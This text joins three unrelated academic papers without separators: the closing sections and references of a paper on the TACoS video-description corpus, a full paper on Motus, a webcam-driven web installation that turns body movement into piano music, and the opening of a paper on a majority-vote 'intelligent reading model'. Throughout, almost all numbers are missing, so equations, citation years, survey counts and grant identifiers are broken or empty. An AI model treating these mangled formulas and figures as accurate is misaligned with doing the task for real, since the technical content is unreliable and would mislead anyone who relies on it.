overall, the supervised classifier contributes a good part to the final results. however, the supervision is not strictly necessary to arrive at a significant correlation; the raw visual features alone are sufficient for the main performance gain seen with the integration of visual information.

conclusion
we presented the tacos corpus, which provides coherent textual descriptions for high-quality video recordings, plus accurate alignments of text and video on the sentence level. we expect the corpus to be beneficial for a variety of research activities in natural-language and visual processing. in this paper, we focused on the task of grounding the meaning of action verbs and phrases. we designed the asim dataset as a gold standard and evaluated several text- and video-based semantic similarity models on the dataset, both individually and in different combinations. we are the first to provide semantic models for action-describing expressions, which are based on information extracted from videos. our experimental results show that these models are of considerable quality, and that predictions based on a combination of visual and textual information even approach the upper bound given by the agreement of human annotators. in this work we used existing similarity models that had been developed for different applications. we applied these models without any special training or optimization for the current task, and we combined them in the most straightforward way. there is room for improvement by tuning the models to the task, or by using more sophisticated approaches to combine modality-specific information (silberer and lapata, ). we built our work on an existing corpus of high-quality video material, which is restricted to the cooking domain. as a consequence, the corpus covers only a limited inventory of activity types and action verbs. note, however, that our models are fully unsupervised (except the visual classifier model), and thus can be applied without modification to arbitrary domains and action verbs, given that they are about observable activities. also, corpora containing information comparable to the tacos corpus but with wider coverage (and perhaps a bit noisier) can be obtained with a moderate amount of effort. one needs videos of reasonable quality and some sort of alignment with action descriptions. in some cases such alignments even come for free, e.g. via subtitles, or descriptions of short video clips that depict just a single action. for future work, we will further investigate the compositionality of action-describing phrases. we also want to leverage the multimodal information provided by the tacos corpus for the improvement of high-level video understanding, as well as for generation of natural-language text from videos. the tacos corpus and all other data described in this paper (videos, low-level annotation, aligned textual descriptions, the asim-dataset and visual features) are publicly available.

acknowledgements
we'd like to thank asad sayeed, alexis palmer and prashant rao for their help with the annotations. we're indebted to carl vondrick and marco antonio valenzuela escrcega for their extensive support with the video annotation tool. further we thank alexis palmer and in particular three anonymous reviewers for their helpful comments on this paper.
this work was funded by the cluster of excellence "multimodal computing and interaction" of the german excellence initiative and the dfg project schi / - .
http://www.coli.uni-saarland.de/projects/smile/page.php?id=tacos

references
luis von ahn and laura dabbish. . labeling images with a computer game. in proceedings of sigchi .
elia bruni, giang binh tran, and marco baroni. . distributional semantics from text and images. in proceedings of gems .
david l. chen and william b. dolan. . collecting highly parallel data for paraphrase evaluation. in proceedings of acl .
timothee cour, chris jordan, eleni miltsakaki, and ben taskar. . movie/script: alignment and parsing of video and text transcription. in computer vision – eccv , volume of lecture notes in computer science, pages – . springer berlin heidelberg.
ido dagan, oren glickman, and bernardo magnini. . the pascal recognising textual entailment challenge. in proceedings of mlcw .
jesse dodge, amit goyal, xufeng han, alyssa mensch, margaret mitchell, karl stratos, kota yamaguchi, yejin choi, hal daumé iii, alexander c. berg, and tamara l. berg. . detecting visual text. in hlt-naacl, pages – .
katrin erk and diana mccarthy. . graded word sense assignment. in proceedings of emnlp .
katrin erk, diana mccarthy, and nicholas gaylord. . investigations on word senses and word usages. in proceedings of acl/afnlp .
katrin erk, diana mccarthy, and nick gaylord. . measuring word meaning in context. cl.
yansong feng and mirella lapata. . visual information in semantic representation. in proceedings of hlt-naacl .
a. m. glenberg. . grounding language in action. psychonomic bulletin & review.
sonal gupta and raymond j. mooney. . using closed captions as supervision for video activity recognition. in proceedings of the twenty-fourth aaai conference on artificial intelligence (aaai- ), pages – , atlanta, ga, july.
abhinav gupta, praveen srinivasan, jianbo shi, and larry s. davis. . understanding videos, constructing plots: learning a visually grounded storyline model from annotated videos. in proceedings of cvpr .
steve r. howell, damian jankowicz, and suzanna becker. . a model of grounded language acquisition: sensorimotor features improve lexical and grammatical learning. jml.
s. mathe, a. fazly, s. dickinson, and s. stevenson. . learning the abstract motion semantics of verbs from captioned videos. pages – .
jeff mitchell and mirella lapata. . vector-based models of semantic composition. in proceedings of acl .
tanvi s. motwani and raymond j. mooney. . improving video activity recognition using object recognition and text mining. in proceedings of the th european conference on artificial intelligence (ecai- ), pages – , august.
jeff orkin and deb roy. . automatic learning and generation of social behavior from collective human gameplay. in proceedings of aamas .
hilke reckman, jeff orkin, and deb roy. . extracting aspects of determiner meaning from dialogue in a virtual world environment. in proceedings of ccs , iwcs ' .
marcus rohrbach, sikandar amin, mykhaylo andriluka, and bernt schiele. a. a database for fine grained activity detection of cooking activities. in proceedings of cvpr .
marcus rohrbach, michaela regneri, micha andriluka, sikandar amin, manfred pinkal, and bernt schiele. b. script data for attribute-based recognition of composite activities. in proceedings of eccv .
carina silberer and mirella lapata. . grounded models of semantic representation. in proceedings of emnlp-conll .
mark steyvers. . combining feature norms and text data with topic models. acta psychologica, ( ): – .
stefan thater, hagen fürstenau, and manfred pinkal. . word meaning in context: a simple and effective vector model. in proceedings of ijcnlp .
peter d. turney and patrick pantel. . from frequency to meaning: vector space models for semantics. jair.
e. tzoukermann, j. neumann, j. kosecka, c. fermuller, i. perera, f. ferraro, b. sapp, r. chaudhry, and g. singh. . language models for semantic extraction and filtering in video action recognition. in aaai workshop on language-action tools for cognitive artificial agents.
carl vondrick, donald patterson, and deva ramanan. . efficiently scaling up crowdsourced video annotation. ijcv.
heng wang, alexander kläser, cordelia schmid, and cheng-lin liu. . action recognition by dense trajectories. in proceedings of cvpr .

an interactive audio-visual installation using ubiquitous hardware and web-based software deployment
submitted march ; accepted may ; published may . corresponding author: tiago fernandes tavares, tavares@dca.fee.unicamp.br. academic editor: sally jo cunningham. additional information and declarations can be found on page . doi . /peerj-cs. copyright tavares. distributed under creative commons cc-by . open access.

an interactive audio-visual installation using ubiquitous hardware and web-based software deployment
tiago fernandes tavares
school of electrical and computer engineering, university of campinas, brazil

abstract this paper describes an interactive audio-visual musical installation, namely motus, that aims at being deployed using low-cost hardware and software. this was achieved by writing the software as a web application and using only hardware pieces that are built into most modern personal computers. this scenario implies specific technical restrictions, which leads to solutions combining both technical and artistic aspects of the installation. the resulting system is versatile and can be freely used from any computer with internet access. spontaneous feedback from the audience has shown that the provided experience is interesting and engaging, regardless of the use of minimal hardware.
subjects human–computer interaction, multimedia
keywords audio-visual interaction, computer music, webcam

introduction
artistic interactive musical installations, like aether (sanchez & castro, ) and intrium (guisan, ), are devices that allow an audience to interact with a sonic environment or musical concept using electronic sensors. in some cases, the installation is built so as to augment the interaction between the public and a specific environment, as in the well-known piano staircase (thefuntheory, ), an installation in which each step in a staircase behaved like the key of a piano, thus causing music to be played when the audience went downstairs and upstairs. more recently, modern motion sensors allowed achieving new possibilities of musical performance and interaction (jung et al., ; chen, maeda & takahashi, ) by mapping movements into musical responses. interactive musical devices present both artistic and technological challenges (garnett, ). they create the possibility of generating music according to a dance, instead of constraining dance to a pre-defined musical piece (morales-manzanares et al., ). hence, they bring to the public a technology-enabled experience that is perceptively different from simply listening to music or dancing to a recording.
nevertheless, most installations are expensive artifacts that must be mounted by a well-trained team. this causes their cultural experience to be restricted to specific environments, such as art galleries, museums or particular events. therefore, the cultural transformation derived from the interaction with a novel music concept has a limited audience range.

how to cite this article: tavares ( ), an interactive audio-visual installation using ubiquitous hardware and web-based software deployment. peerj comput. sci. :e ; doi . /peerj-cs.

the installation proposed in this article, namely motus, aims at being deployed for a broad public. this is achieved by combining a web-deployed software stack, little hardware requirements and simple, yet engaging, methods for interaction. as a result, the experience provided by motus is made accessible for any person with an internet connection and a laptop with a webcam. the installation uses a camera as a sensor device, and a simple motion detection algorithm (wirayuda et al., ) to characterize the audience's movements. the musical generation, based on markov chains (schulze & van der merwe, ; pachet, ; cope, ), aims at converting the detected movement intensity into the intensity of the musical manifestation without requiring previous musical knowledge from the audience. the installation software also comprises auditory and visual feedback, which may use the laptop's hardware (screen and speakers) or external devices such as sound reinforcement systems and projectors. the remainder of this article is organized as follows. first, related work is presented in 'related work,' followed by a discussion about the artistic concepts behind the development of motus in 'artistic concept.' in 'the installation,' motus is thoroughly described both from the artistic and the technical points of view. further discussion, based on interactions with the audience, is conducted in 'audience feedback and discussion.' last, 'conclusion' brings conclusive remarks.

related work
a great number of interactive art installations has been constructed in the last decade. each one of them implements an underlying purpose, which is often discussed in academic publications. some are especially related to motus, as will be discussed below. birchfield et al. ( ) brought forward the question of placement of an installation, and its impact on the usage of a public space. after implementing sonification of a bus stop in a busy street, they observed that the general public often feels self-conscious about producing sounds in this environment. henceforth, audience engagement is an important, non-trivial issue to be considered in installations. a possible technique to achieve audience engagement is to develop a specific space for the installation, providing both auditory and visual stimuli (kobori et al., ; seo & corness, ). however, as observed in the piano staircase (thefuntheory, ), audience engagement may happen even if the installation is placed in a public space. this indicates that the placement of the installation does not cause audience engagement alone.
in the evaluation of the interactive dance installation hoppsa universum (kallblad et al., ), it was shown that the audience's perception was frequently described with expressions like "it was fun" or "be with friends." later, schacher ( ) noted that audience engagement is related to the fast understanding of the interaction model, which may restrict the usage of more complicated interfaces or algorithms. morreale, masu & angeli ( ) presented an algorithm, namely robin, capable of generating piano music from the spatial position of members of the audience. the algorithm uses a rule-based system that models western piano style music, and may be used by untrained (non-musician) members of the audience. it was presented in an installation that was well-evaluated, with great acceptance ratios. motus considers all of these aspects, but, unlike the work discussed above, it does not require special hardware (other than that present in most current laptops) or preparations to be used. it aims at being easily used, including by an untrained audience, which reflects on the simplicity of its interaction model, and its software is deployed as a web application, thus it can be readily used in private spaces. motus is thoroughly described in the next section.

artistic concept
motus was first idealized from the idea of converting movements to music using a camera. its name comes from the latin word that means "motion." this section describes the artistic concepts over which it was constructed. the musical concept behind motus was derived from improvised genres, like free jazz and some styles of ethnic drum circles. during an improvisation session, it is important to perceive the other members of the ensemble and create some form of communication with them. in this context, elements such as harmony and rhythm may be transformed to fit the communication process that emerges in each session. according to the model presented by dubberly, pangaro & haque ( ), this type of interaction is mediated by the intention of each agent. this means that the correspondence to an intention is, for the improvisation group, more important than the achievement of technical precision. therefore, motus uses a music generation model that responds to the audience's intention. for the construction of the interactive system, this intention must be assigned to control a measurable aspect of the generated music. since motus is intended to be used by an untrained audience, the musical aspect controlled by the audience's intention must be simple to understand. for this reason, the audience's intention was assigned to control the musical intensity. to evaluate the audience's intention using the webcam, it was necessary to estimate the intensity of captured movements. instead of mapping particular movements to specific sonic representations, a general movement intensity was measured using pixel-by-pixel differences. this allows the audience to explore not only the interaction with motus, but also the diverse possibilities of using their bodies, interacting with friends or using objects. with the goal of inducing broader movements, the video area was divided into different regions, each related to a sonic representation. the audience can visualize the video feed, with a color scheme that highlights the regions that are most active. in addition to the aesthetic appeal, this feedback helps understanding the interaction process.
for this same reason, piano sounds were used for audio rendering. they have the goal of being easy to recognize, as most of the general audience (at least in western countries) is familiar with the instrument. the installation is described from a more technical point of view in the next section.

figure : installation overview.

the installation
the main concern when developing motus was that it could be used by as many people as possible. steps towards this goal were taken by requiring as little external hardware as possible and by deploying the software as a web application. the hardware necessary to mount the installation was restricted to that available in a common laptop, i.e., a webcam, a video screen and internal speakers, leading to an overall system as described in fig. . the deployment problem can be solved by using javascript as the main programming language. it can be used to deploy the application directly on a host web browser. however, this choice also poses a performance restriction, as javascript applications are usually slow when compared to native (compiled) programs. on the artistic side, the concept behind motus is that it should convert movement to music. this conversion means that user movements should trigger a musical response, and more intense movements should correspond to a more intense musical response. therefore, two subsystems are necessary: one comprising a movement detection algorithm and another one containing a musicological model that generates musical responses. also, it quickly became clear that a video feedback of the detection process could improve the audience's experience. this happens because the visual information allows the user to understand and appropriate their interaction with a novel musical device. as a result, a greater level of immersion could be provided. therefore, motus can be detailed in a block diagram as shown in fig. . all blocks in gray are software, and will be executed within the computer shown in fig. . the following sub-sections will present a thorough description of the movement detection, video rendering, the musicological model and the audio rendering system.

movement detection
the movement detection process applied in motus is very simple, as the web-based implementation does not allow for computationally demanding algorithms. the algorithm begins with the calculation of the value v_p of each pixel p as the sum of its red, green and blue channels, as is common practice in computer vision algorithms (szeliski, ). hence, it may be expressed by:

v_p = r_p + g_p + b_p.  ( )
each partition had its own movements intensity estimation, and, as will be seen later, is related to a different part of the interaction experience. in preliminary tests, it was noticed that µ[t] changes too quickly, which gives an impression of chaos and lack of control. hence, it was necessary to apply a filter to each µt signal before using it for further purposes. an attack-release filter was applied, using the following expression: µ̂[t] =  αµ[t] + ( − α)µ̂[t − ] if µ[t] > µ̂[t − ] βµ[t] + ( − β)µ̂[t − ] if µ[t] ≤ µ̂[t − ]. ( ) the attack-release filter acts as a low-pass filter whose cut-off frequency is different whether the input signal is higher or lower than the last output. higher values for the α and β coefficients correspond to shorter attack and release times, respectivelly. they were manually adjusted so that the resulting interaction was smooth as desired. tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. hence, the result of the movement detection process is a set of four movement estimates µ̂[t], one for each partition. this result was used both in the musicological model and the video rendering process, as it will be discussed later. video rendering the visual feedback provided by m aims at two correlated but different goals. the first is to yield feedback on what the system is doing; that is, what is being detected. the second is to make the audience experience more immersive and engaging. three dimensions of the system’s inner mechanisms were chosen to be conveyed: the captured image values vp as in expression ( ), the differences between the current frame and the previous frame (|vp[t] − vp[t − ]|) and the final detected movement intensity in each partition µ̂[t] as in expression ( ). to allow the audience to clearly visualize each aspect of the interaction, these parameters were mapped to different colors. these colors were arbitrarily chosen to be blue, red and green, which colored the feedback video creating a particular aesthetic environment. as stated before, the values of each frame were mapped to the blue channel of the feedback video. the blue color, then, becomes dominant at almost all times, which gives the installation a general feeling of blue. as a consequence, blue is a color related to musical rest. each pixel’s absolute difference to the previous frame was mapped to the red channel. this caused a red “ghost” to appear in point where strong movements were detected, indicating that an interaction was detected. this piece of visual feedback is bounded to the user and became subtle when compared to other cues. the amount of movement µ̂[t] in each frame partition was mapped to the green channel of the corresponding pixels. this aimed at helping the audience to relate movements to sounds, as a particular category of sonic responses would be clearly correlated to specific blinks in a region of the screen. this piece of visual feedback is strongly correlated to the musicological model employed, as it will be seen below. a screenshot of the video feedback in action is shown in fig. , converted to gray scale to ensure visibility in printed media. as it can be seen, screen areas in which there is more movement are highlighted, and it is possible to visualize both the body movement detection and the activation of screen areas related to musical responses. thus, the audience’s impact on the audiovisual environment is easily visualized. 
musicological model
the generation of musical sequences was done by means of four musicological models, each receiving as input the amount of movement of a different video partition. in all cases, the model should yield a musical manifestation that is perceived as more intense when movements in that partition are more intense. also, this correlation should be perceived almost immediately. in addition, the models were built so that no strong sensation of downbeat would emerge, hence avoiding inducing the audience to perform known popular dance moves and favoring the exploration of different body movements. the sensation of closure commonly found in tonal music (e.g., in i–iv–v–i sequences) was also avoided, preventing the comparison of the generated music with known pieces and also favoring experimentation. to keep the interaction more interesting, each partition was bound to a different musicological behavior, which aimed at inducing the audience to explore the whole interactive space.

an aesthetic choice that fits all of these requirements was to make all models yield sequences of musical notes, which is a musical paradigm that is easily recognized by most of the audience. when the sequences are required to be more intense, their notes become increasingly faster and louder. in order to make all musicological models yield sequences that sound as part of the same piece, they were all bound to the same octatonic scale, and differences were added in the way each model creates a path within that scale.

figure: block diagram for the musical interactivity.

as shown in the musical interactivity block diagram, each generative system is independent from the others. they correspond to four different voices, namely upper, middle, harmony and bass. all of them yield note sequences, which are later rendered. one sequence generation model relies on a markov chain (cope, ), adjusted so that the next note is equally likely to be equal to the previous note, a step down or a step up the scale. this model was used in the upper and the middle voices, which were also restricted to particular note ranges. the note range restriction allows users to quickly recognize each one of the voices. the other sequence generation model was purely random choice. in the lower voice (the bass), a random note from the scale (within the range restriction) is yielded at each interaction. in the harmony voice, two random notes from the scale (also within the range restriction) are yielded at each step.

all four voices had different functions to transform the input (movement intensity in the corresponding partition) into values of note speed and loudness, so that more intense movements are mapped to faster and louder notes. these functions were manually adjusted to provide a balanced auditory response for each space partition, as well as an interesting experience. in all cases, it proved useful to apply a lower-bound filter to the input, below which the input is considered noise and produces no sonic response. as a result, motus quickly responds to the audience's actions. it yields a sequence of notes that are almost always dissonant and out of sync with each other. nevertheless, the note sequences aim to be perceived as correlated to the audience's movements. this design fits the employed technology (javascript), which is known for having imprecise timing mechanisms in current implementations. as note lengths are continuous and not bound to the notes in other voices, the lack of synchronization does not harm the final result. this also allowed the audio rendering process to be performed by independent agents, as discussed below.
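the note generation just described can be outlined in the following sketch. the concrete scale, note ranges and the intensity-to-speed/loudness mapping are assumptions made for illustration; they stand in for the manually adjusted functions mentioned above.

```python
import random

SCALE = [60, 62, 63, 65, 66, 68, 69, 71]  # one octave of an octatonic scale (midi pitches), assumed

def markov_step(index):
    # next scale degree is equally likely to repeat, step down or step up
    index += random.choice([-1, 0, 1])
    return max(0, min(len(SCALE) - 1, index))

def next_pitches(voice, state):
    # upper and middle voices: markov random walk; bass: one random note;
    # harmony: two random notes (note-range restrictions omitted for brevity)
    if voice in ("upper", "middle"):
        state[voice] = markov_step(state.get(voice, 0))
        return [SCALE[state[voice]]]
    if voice == "bass":
        return [random.choice(SCALE)]
    return [random.choice(SCALE), random.choice(SCALE)]

def intensity_to_note_params(mu_hat, threshold=2.0):
    # inputs below the threshold are treated as noise and produce no note;
    # more intense movement gives faster (shorter) and louder notes
    if mu_hat < threshold:
        return None
    duration = max(0.1, 1.0 / (1.0 + mu_hat))      # seconds per note
    loudness = min(1.0, mu_hat / 50.0)
    return duration, loudness
```

in this outline, each voice would repeatedly draw its next pitch (or pair of pitches, for the harmony voice) and hand it to the audio renderer together with the duration and loudness derived from the smoothed movement of its partition.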
audio rendering
the audio rendering process was based on agents that receive pitch, loudness and duration information from the note sequences generated by the musicological models. when a note is finished (i.e., its duration has expired), the system proceeds to render the next note (or notes, in the case of the harmony voice), and so on. to keep the interactivity process in real time, the note generation and rendering processes must be synchronized, so that a request for a new note triggers its calculation. since the system should be easy to understand, it was chosen that all voices would be rendered as a piano sound, using sampling. this way, it was expected that the majority of the audience would be able to identify the sounds coming from the system, even when bad speakers are used. the rendering system was implemented using a ready-made sequencing library (midi.js). after being built, the system was tested with both online and live audiences. this process provided rich feedback, as discussed below.

audience feedback and discussion
motus was displayed both online and for a live audience, which are respectively discussed in 'online' and 'live'. these are very different situations, as a live context demands a dedicated space for people to move without harming others, a stronger audio system capable of competing with other environmental sounds, and a screen that allows visualization from a few meters of distance. this is not the case for online displays, which can be visualized from one's living room or office, thus requiring less powerful hardware.

online
for the online interactions, the system was advertised on social networks, and feedback was obtained both spontaneously and from an optional evaluation form. the questions in the form were:

1. do you play musical instruments and/or sing? (multiple choice: no, and i am not interested; no, but i would like to; yes, casually; yes, frequently; yes, professionally)
2. do you dance? (multiple choice: no, and i am not interested; no, but i would like to; yes, casually; yes, frequently; yes, professionally)
3. what audio device did you use in the interaction? (multiple choice: no sound; embedded laptop or desktop audio; small computer speakers; headphones; big audio system or surround)
4. what screen did you use in the interaction? (multiple choice: no screen; computer or laptop screen; big screen or projector)
5. how do you evaluate your interaction with motus? (multiple choice: not interesting, a little interesting, very interesting, extremely interesting)
6. describe how your interaction with motus was (optional, open question)
7. what would you change or add in motus? (optional, open question)
8. select from the items below what you would like to do with motus in the future. (multiple choice, multiple answers: keep interacting; recommend to friends; download as a mobile app; contribute to next version; other)
9. please, provide any other feedback you find relevant.

volunteer subjects responded to the questionnaire, and the majority classified motus as "very interesting" or "extremely interesting" in the evaluation question. although this shows the device was well evaluated, it is also interesting to highlight the conditions that led to this evaluation. therefore, these results were jointly analyzed with the answers regarding the hardware used by each subject and their prior interest in dance and music. as will be seen, no subject classified motus as "not interesting". this is an encouraging result, but it can also mean that uninterested subjects simply chose not to answer the questionnaire. nevertheless, the provided answers gave important insight into the audience's usage and perception of the installation.

figure: interest in motus according to audio hardware ("other" refers to one subject that reported using a mobile device for the interaction).

the audio hardware figure shows the number of subjects with each type of audio reproduction hardware, grouped by their reported interest in motus (all subjects reported using their default screen for the interaction). it may be noted that using laptop (embedded) speakers did not harm the interaction. on the other hand, no subject using headphones reported motus as "extremely interesting", which can indicate that full body movements are an important part of the experience. the data indicates that motus was successfully deployed over the web using ubiquitous hardware, as it was designed for. according to the audience, the use of minimal hardware does not harm the overall experience.

however, it is important to detect which aspects impact the subjects' reported interest level. to detect that, the reported interest levels were grouped according to the subjects' prior interest in dancing or in playing instruments and singing, as shown in the artistic activities figure. the gathered data shows that users with a greater interest in dancing tend to report a greater interest in motus, but a similar behavior is not observed when considering their interest in playing instruments or singing. this is further evidence that performing body movements is related to a more interesting experience with the installation.

figure: interest in motus according to frequency of artistic activities.

all the subjects chose at least one option in the question about future use. this shows that possibilities for future use were considered. as shown in the votes table, most subjects would like to keep interacting or recommend motus to friends, which are indicators of a positive experience with the installation. the answers with "other" regarded using motus in different situations (in a classroom and using a video feed from a landscape), which also points to a positive experience.

table: number of times each option in the future-use question was chosen (actions: keep interacting, recommend to friends, download as mobile app, contribute to next version, other).

the experience descriptions (from the open question about the interaction) showed that most subjects first engaged in an exploratory stage, in an attempt to detect the rules governing motus, and then started applying their own repertoire to the interaction. according to the reports, the exploration of their own sensations and body movements tended to generate more pleasant experiences than attempts to generate specific musical movements.
the musical generation was perceived as simple, as most subjects were able to quickly understand it. the majority of the suggestions for future work, provided as answers to the question about what to change or add, point toward changing the installation's musicological model. also, each suggestion was very different from the others, for example: "add more instruments", "i tried to play the blues" and "i don't like the way notes fade out". this is an indication that the musicological model, and probably the screen division for interaction, should be freely composed by users, possibly sharing their results.

almost all comments regarding the interaction with the webcam related to the division of the screen. again, each user had a different suggestion, including increasing the number of divisions and constructing neutral areas that could be used to silently move between other areas. only one comment suggested the use of a finer motion acquisition algorithm, allowing finger positions to be detected.

the spontaneous feedback was obtained from messages sent by e-mail and on social networks. most of it manifested pleasant surprise, as such a web application was perceived as novel. these messages also provided interesting comments regarding the online interaction. the most common one was a desire to record the interaction and share it on social networks; in an extreme case, a user posted a screenshot of the visual feedback online. this was not implemented in the system, but the demand clearly indicates a direction for future work. there was also a demand for porting the system to mobile environments. this is not possible at the moment because of the reduced processing power of mobile devices; however, it was not tested how the algorithm would behave if implemented as a native application. interestingly, some online users did not allow motus to use their camera, hence harming the experience. this happened because the system was mistaken for privacy-invading malware. a more informative website may be used in the future to prevent this from happening.

live
when shown live, motus was mounted using a big screen for video feedback (either a screen or a projector, depending on the venue) and an amplifier for audio playback. it was ensured that there would be some free space for movements (as much as possible, which also depended on the venue). care was taken so that the camera was pointed towards somewhere with no accidental movements (e.g., people passing by or strong shadows from outside) and with more or less uniform illumination, allowing the camera to work properly.

it was found that the interaction with the system made a small part of the audience too self-conscious to engage in participation. two possibilities for that are the mirror characteristic of the visual feedback and the discomfort of executing random movements in a public space. however, this was not true for everyone. part of the audience quickly engaged in exploring the limits within which the sonic response of the installation could be controlled. they tended to approach the camera and perform finer arm and hand movements. some manifested the sensation of playing an imaginary spatial piano. the more extroverted part of the audience quickly engaged in exploring different body movements.
an interesting interaction appeared when groups of people started interacting with the system together, which is perfectly possible due to the nature of the movement detection algorithm. these interactions generally took a longer time and usually involved smiles and laughter. finally, an interesting manifestation was given by the audience, especially those who had previously played musical instruments. they clearly manifested frustration with the lack of control possibilities in the interaction, as the same movement is not always related to the exact same musical response. also, there were comments on the simplicity of the interaction process, which made it boring after a few minutes of exploration.

although ambient lighting is usually a problem in camera-based movement detection systems, it was found that the system is robust to many different conditions. the system worked under different lighting conditions and presented adequate behavior except when lights blinked. however, the interaction experience changed slightly depending on the colors of the background and of the audience's clothes.

conclusion
this paper described motus, a digital interactive audio-visual installation that requires only hardware available in most computers and has its software deployed as a web application. the aesthetic concept behind the system is that it should convert movement to music. these premises, the technical deployment and the desired artistic result, led to a series of design and aesthetic decisions, which are thoroughly described. motus was shown in live performances, as well as on a website. feedback was collected from the audience using a questionnaire and from spontaneous comments, which made it possible to evaluate how the interaction with the system happened. it was found that this interaction was, most of the time, positive, but it was sometimes found not very engaging, as it does not allow many musical aspects to be explored.

the installation can be accessed at http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html and can be freely used by anyone. currently, it requires the google chrome browser. the source code is also available online at https://github.com/tiagoft/motus. the installation system is ready to be presented to large audiences, and there seem to be two clear directions for future work. the first is to allow recording of audio and video, as well as sharing of this content on social networks. the second is to allow users to compose and share their own interaction models, with a broader range of musical material.
additional information and declarations

funding
this work has been funded by fapesp, under grant / - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the author: fapesp: / - .
competing interests
the author declares there are no competing interests.

author contributions
• tiago fernandes tavares conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, and reviewed drafts of the paper.

data deposition
the following information was supplied regarding the deposition of related data: the source code is available on github (https://github.com/tiagoft/motus).

references
birchfield d, phillips k, kidané a, lorig d. interactive public sound art: a case study. in: proceedings of the international conference on new interfaces for musical expression (nime). available at http://www.nime.org/proceedings/.
chen s, maeda y, takahashi y. melody oriented interactive chaotic sound generation system using music conductor gesture. in: ieee international conference on fuzzy systems (fuzz-ieee). piscataway: ieee.
cope d. techniques of the contemporary composer. new york: schirmer books.
dubberly h, pangaro p, haque u. on modeling: what is interaction? are there different types? interactions.
garnett g. the aesthetics of interactive computer music. computer music journal.
guisan ac. interactive sound installation: intrium. in: proceedings of the international conference on new interfaces for musical expression (nime). available at http://www.nime.org/proceedings/.
jung d, jensen mh, laing s, mayall j. cycli: an interactive performance combining dance, graphics, music and kinect-technology. in: proceedings of the international conference of the nz chapter of the acm's special interest group on human–computer interaction (chinz). new york: acm.
kallblad a, friberg a, svensson k, edelholm es. hoppsa universum: an interactive dance installation for children. in: proceedings of the international conference on new interfaces for musical expression (nime). available at http://www.nime.org/proceedings/.
kobori d, kagawa k, iida m, arakaua c. line: interactive sound and light installation. in: proceedings of the international conference on new interfaces for musical expression (nime). available at http://www.nime.org/proceedings/.
moeslund tb. introduction to video and image processing. berlin: springer.
morales-manzanares r, morales e, dannenberg r, berger j. sicib: an interactive music composition system using body movements. computer music journal.
morreale f, masu r, angeli ad. robin: an algorithmic composer for interactive scenarios. in: proceedings of the sound and music computing conference (smc). available at http://www.academia.edu/.
pachet f. the continuator: musical interaction with style. in: international computer music conference (icma). available at https://www.csl.sony.fr/.
sanchez t, castro g. aether: interactive audiovisual installation. available at http://vimeo.com/ (accessed july).
schacher jc. action and perception in interactive sound installations: an ecological approach. in: proceedings of the international conference on new interfaces for musical expression (nime). available at http://www.nime.org/proceedings/.
schulze w, van der merwe b. music generation with markov models. ieee multimedia.
seo j, corness g. nite aura: an audiovisual interactive immersive installation. in: proceedings of the international conference on new interfaces for musical expression (nime). available at http://www.nime.org/proceedings/.
szeliski r. computer vision: algorithms and applications. berlin: springer.
thefuntheory. piano stairs. available at http://www.thefuntheory.com/piano-staircase (accessed july).
wirayuda t, laksitowening k, sthevanie f, rismala r. development methods for hybrid motion detection (frame difference-automatic threshold). in: international conference of information and communication technology (icoict). piscataway: ieee.
international journal of advanced network, monitoring and controls

a study of intelligent reading model

yu jun, school of computer science and engineering, xi'an technological university, xi'an, shaanxi, china. e-mail: yujun@xatu.edu.cn
kang qinyu, school of computer science and engineering, xi'an technological university, xi'an, shaanxi, china. e-mail: @qq.com
hu zhiyi, engineering design institute, army academy of pla, beijing, china. e-mail: huzhiyi v @ .com
li zhonghua, school of computer science and engineering, xi'an technological university, xi'an, shaanxi, china. e-mail: @qq.com

abstract: in order to solve the problem of how to find the required information quickly in a large amount of reading text, this paper constructs an intelligent reading model. the model adopts the principle of "the minority obeys the majority": the results of the classifiers trained by three algorithms, namely decision tree, bagging and gaussian bayes, are filtered to build the intelligent reading model. based on the experimental results, an objective evaluation of the new combined algorithm is obtained.

keywords: natural language processing (nlp); decision tree; bagging; gaussian bayesian algorithm

i. introduction
in recent years, with the rapid development of the internet and other emerging media, human beings have entered the era of information explosion. at the same time, more and more people hope that computers can understand human language so as to help them perform various daily tasks better. natural language processing (nlp) [ ], as a typical example of artificial intelligence applied in a practical field, is a necessary means for modern people to mine large amounts of data and information. its main goal is to let computers learn to understand and use human natural language. therefore, natural language processing has become a research hotspot in recent years.

at present, as one of the representative products of natural language processing, "smart interactive technology" [ ] has gradually penetrated many products. however, many smart products can only recognize specific commands. for example, when the input is "open qq" (qq is the abbreviation of tencent qq, an internet-based instant messaging software developed by tencent), the software starts qq; but when the input is "look at qq", nothing happens. in addition, people have to read a lot of text in daily life, such as novels, tutorials, etc. sometimes the problem can be solved by looking at only a small part of the text, without having to read through the whole article.
for example, we can resolve legal doubts by looking up certain passages in the legal literature, without needing to read the entire text. on this basis, in order to make reading more "intelligent", we need to establish an intelligent reading model that can use natural language to communicate with machines and let machines serve us, so as to minimize the learning burden. this paper builds such an intelligent reading model.

english is based on words, which are separated by spaces. chinese, however, is written as a continuous sequence of characters, and the characters in a sentence must be grouped together to express a complete meaning. for the english sentence "i am a student", the computer can easily tell from the spaces that "student" is a word; in the chinese equivalent, the word for "student" is made up of two characters, which only convey that meaning when combined. therefore, chinese word segmentation divides a sequence of chinese characters into meaningful words. because chinese word segmentation carries a certain amount of uncertainty, several different technologies have to be adopted, such as jieba word segmentation [ ] and the tf-idf weight algorithm [ ].

in view of the simplicity of previous models, a new combination model, namely our intelligent reading model, is constructed by combining multiple algorithms and adopting the principle of "the minority obeys the majority". this principle means that if a data item is classified by three classifiers and two of the three outputs agree, the majority label is taken as the final result. finally, the validity of the model is verified by experiment and calculation.

ii. the overall process of building an intelligent reading model

the establishment of the intelligent reading model includes five parts: data acquisition, data processing, feature extraction, training classifiers, and building the model. the overall process is shown in figure , and the details are as follows.

figure . overall framework (data acquisition → data processing → feature extraction → training classifier → building model)

1) data acquisition: because there are all kinds of text on the network and the quantity is huge, a python network crawler [ ] is used to obtain the data, which is stored in a txt file.
2) data processing: because the raw word segmentation is inaccurate, an algorithm based on information entropy is used to find new words and add them to a custom dictionary; the text is then processed with chinese word segmentation, stop-word filtering and so on.
